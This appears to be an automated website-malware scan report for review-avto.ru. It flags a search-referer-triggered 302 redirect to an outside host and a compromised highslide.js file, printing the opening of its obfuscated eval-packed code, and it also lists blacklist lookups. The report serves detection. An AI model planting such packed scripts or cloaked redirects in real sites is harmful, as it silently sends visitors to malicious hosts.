Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://review-avto.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: review-avto.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 09 Oct 2014 11:05:28 GMT Pragma: no-cache Location: http://site.portrelay.com/ Server: nginx/0.7.67 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=2d1uq9g1jhutvtojh09urh52e1; path=/ X-Powered-By: PHP/5.3.3-7+squeeze8 | malicious |
Scanned pages/files
Request | Server response | Status |
http://review-avto.ru/ | 200 OK Content-Length: 30258 Content-Type: text/html | clean |
http://review-avto.ru/engine/classes/min/index.php?charset=windows-1251&g=general&5 | 500 Internal Server Error Content-Length: 0 Content-Type: text/html | clean |
http://review-avto.ru/test404page.js | 404 Not Found Content-Length: 292 Content-Type: text/html | clean |
http://review-avto.ru/engine/classes/min/index.php?charset=windows-1251&f=engine/classes/highslide/highslide.js&5 | 200 OK Content-Length: 32882 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('q(!m){u m={Y:{8G:\'8i\',8k:\'a9...\',8l:\'6w 1E 9X\',8g:\'6w 1E af 1E aa\',6n:\'a2 1E a7 B (f)\',7F:\'a4 by <i>8L 8P</i>\',7R:\'a6 1E a0 8L 8P at\',9Q:\ Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21308 Content-Type: text/javascript | clean |
http://crackac.com/60rb4e1/5497 | 200 OK Content-Length: 8226 Content-Type: application/javascript | clean |
http://counter.rambler.ru/top100.jcn?1763990 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=review-avto.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://review-avto.ru/
Result: review-avto.ru is not infected or malware details are not published yet.
Result: review-avto.ru is not infected or malware details are not published yet.